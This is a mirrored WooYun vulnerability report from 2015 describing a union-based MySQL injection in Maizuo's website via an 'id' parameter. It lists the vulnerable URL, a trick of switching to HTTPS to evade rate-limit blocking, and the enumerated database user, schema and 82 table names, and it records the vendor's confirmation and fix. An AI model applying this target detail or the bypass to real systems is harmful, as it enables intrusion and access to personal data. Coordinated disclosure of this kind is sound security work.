乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-12: 细节已通知厂商并且等待厂商处理中 2015-01-13: 厂商已经确认,细节仅向厂商公开 2015-01-23: 细节向核心白帽子及相关领域专家公开 2015-02-02: 细节向普通白帽子公开 2015-02-12: 细节向实习白帽子公开 2015-02-26: 细节向公众公开
卖座网主站一处MySQL注射(支持union)
注入点:
http://www.maizuo.com/zt/index.htm?id=279
参数id可注入。MySQL,支持union.
该站点访问过快会被临时屏蔽,But,发现了一个绕过的方法:
http访问过快确实被屏蔽了,使用https访问,则再快都不会被拦截。
当前数据库用户:
current user: '[email protected]'
数据库:
available databases [2]:[*] dMaizuo_Manage[*] information_schema
数据表:
Database: dMaizuo_Manage[82 tables]+-----------------------------+| tAppActivity || tAppActivity_prize || tAppAdvertise || tAppChannel || tAppManage || tAppPicture || tAppRedTip || tAppReview || tAppVersion || tCCBActive || tCCBActive_prize || tCCBActive_user || tCCBActive_userinfo || tCCB_feedback || tCard_CompanyPurchase || tCard_newCardMoney || tCard_newCardNo || tCard_newCardPrivilege || tCilentCode_active || tCilentCode_cinema || tCilentCode_user || tConfigInfo || tCrazyConfirmCodeLog || tCrazyPageForetell || tCrazyPageMsg || tCrazyUserBuy || tCrazy_mobilecode || tDingZuo_Login || tDingZuo_active || tDingZuo_activeCode || tDingZuo_hotActive || tDingZuo_mobilecode || tDingZuo_newsEye || tDingZuo_newsImage || tDingZuo_orderMessage || tDingZuo_special || tDingZuo_specialActive || tDingZuo_timeActive || tDingZuo_tuan || tDingZuo_tuan_cinema || tDingZuo_userInvite || tDingZuo_userapply || tDingZuo_userbuy || tDingZuo_usermessage || tFeedBack_reply || tFeedBack_theme || tFiveActive_buyTicket || tFiveActive_cityCount || tFiveActive_movie || tFiveActive_read || tH5StaticPage || tHB_Active || tHB_App || tHB_Content || tHB_Prize || tHB_User || tManage_page || tMsnModel || tNetSale || tNewsPush || tOrderMail || tReserve || tReserve_template || tSinglePush || tSmsTemplate || tTaoBaoSeat || tThirdExchange_account || tThirdNewOrder || tThirdOrderStatus || tThirdPartyReservation || tThirdPartyReservation_2014 || tThirdParty_account || tThirdParty_seat || tThird_blogCardNo || tWeChat_cashVoucher || tWeChat_ticketCode || tWechat_menu || tWeekFilmEye || tYouHui_limit || tYouHui_rule || tYouZheng_slide || t_page_jump |+-----------------------------+
数据库中应该有电影兑换码和个人信息,未再深入。
参数过滤,类型转换
危害等级:高
漏洞Rank:15
确认时间:2015-01-13 17:56
已经在修复,稍后送出礼物,多谢
暂无